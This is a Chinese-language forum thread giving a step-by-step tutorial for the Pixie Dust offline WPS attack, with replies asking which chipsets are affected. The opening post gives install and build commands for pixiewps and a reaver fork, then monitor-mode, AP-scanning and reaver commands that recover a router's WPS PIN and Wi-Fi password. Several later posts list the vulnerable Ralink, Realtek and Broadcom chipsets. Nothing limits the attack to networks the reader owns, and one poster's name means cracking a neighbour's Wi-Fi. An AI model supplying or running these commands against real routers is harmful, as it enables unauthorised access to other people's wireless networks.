pixiewps reaver WPS离线PJ 详细教程

zacp

既然坛子里的朋友想看，就抓紧放上来

工具说明：
pixiewps 是一个wps离线攻击工具，利用了芯片上的算法漏洞，成功率不是很高，具体可以看
http://www.anywlan.com/thread-356695-1-1.html  wps 离线攻击.

英文好的可以看
https://forums.kali.org/showthre ... fline-WPS-Attack%29  WPS Pixie Dust Attack (Offline WPS Attack)

reaver 1.5.2  这个是社区维护的reaver的分支，之所以使用这个版本是因为它加入了一个-K 参数 可以调用pixiewps来得到pin码，然后直接出密码，而不用输入命令。
https://github.com/t6x/reaver-wps-fork-t6x

安装

CDLinux
http://www.anywlan.com/thread-362108-1-1.html  pixiewps + reaver-wps-fork-t6x of cdlinux 0.9.7.1

感谢open2012大神

Kali Linux

apt-get install reaver pixiewps
如果你会使用git 也可以从github下载源码编译
pixiewps 1.1
cd /tmp
git clone https://github.com/wiire/pixiewps
cd pixiewps
make & make install

reaver 1.5.2 编译方法同上，先./configure
make & make install
https://github.com/t6x/reaver-wps-fork-t6x

Wifislax

可以使用我打包好的模块
http://www.anywlan.com/thread-362269-1-1.html  //这里下载
也可以从github上编译，和kali linux下是一样的

使用
首先确保你的无线网卡能工作，进入monitor模式
airmon-ng start wlan0

使用wash -i mon0 来扫描开WPS的AP ctrl+c停止

使用命令
reaver -i mon0 -b 想要攻击的AP'MAC地址 -v  -K 1  
如果存在该漏洞的话，很快就能出pin和密码了

优点
几乎是秒破的节奏！
缺点
成功率着实不高

zacp

马上成功 发表于 2015-5-25 15:20
请问是那些路由器有这个漏洞？

那要看哪些路由器采用这些有问题的芯片了
Vulnerable Manufacturers
-Ralink: E-S1 = E-S2 = 0  //雷凌
-Realtek: E-S1 = E-S2 = N1 Enrollee Nonce or generated with seed = time  //瑞昱yu
-Broadcom: E-S1 + E-S2 are generated from the same PRNG that generated the N1 Enrollee Nonce  //博通
大神的说法是
雷凌芯片ap,少量博通芯片ap,atheros芯片ap不受影响.TP-LINK用atheros芯片的比较多,...

mouse1rat1

感谢分享，下来试试看！我是U盘启动的CDLINUX  0.9.6.1，我的LOCAL文件夹下没有REAVER.TGZ？？？小白压力大，楼主能否详细说说。谢谢！

ChowLiang

“优点
几乎是秒破的节奏！
缺点
成功率着实不高”

实事求是，顶帖。

hda

楼主，有哪些芯片啊？

爆破邻居wifi

这贴子可以是精华   了   

1170082663

做个记号，，，，，

呵呵呵呵23

支持一下拉了，还不错呢

1129522185

看看叫师傅贰看认识他根本去

chirsmay

实际作用不大，但也算一种PJ方法啦，可一试

13717198664

monitor模式是什么

zacp

13717198664 发表于 2015-5-22 19:00
monitor模式是什么

混杂模式。。。。

zacp

hda 发表于 2015-5-22 18:06
楼主，有哪些芯片啊？

忘说了，谢谢提醒，官方的说法是
Vulnerable Manufacturers
-Ralink: E-S1 = E-S2 = 0  //雷凌
-Realtek: E-S1 = E-S2 = N1 Enrollee Nonce or generated with seed = time  //瑞昱yu
-Broadcom: E-S1 + E-S2 are generated from the same PRNG that generated the N1 Enrollee Nonce  //博通
大神的说法是
雷凌芯片ap,少量博通芯片ap,atheros芯片ap不受影响.TP-LINK用atheros芯片的比较多,...